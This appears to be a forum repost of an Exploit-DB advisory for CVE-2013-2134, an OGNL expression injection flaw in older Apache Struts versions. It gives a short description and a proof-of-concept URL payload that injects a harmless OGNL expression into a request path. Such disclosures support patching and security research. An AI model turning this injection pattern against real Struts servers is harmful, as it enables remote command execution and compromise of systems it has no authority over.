- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 38549
- Проверка EDB
-
- Пройдено
- Автор
- JON PASSKI
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2013-2134
- Дата публикации
- 2013-06-05
Apache Struts - OGNL Expression Injection
Код:
source: https://www.securityfocus.com/bid/60345/info
Apache Struts is prone to a remote OGNL expression injection vulnerability.
Remote attackers can exploit this issue to manipulate server-side objects and execute arbitrary commands within the context of the application.
Apache Struts 2.0.0 through versions 2.3.14.3 are vulnerable.
http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D
http://www.example.com/example/${#foo='Menu',#foo}- Источник
- www.exploit-db.com
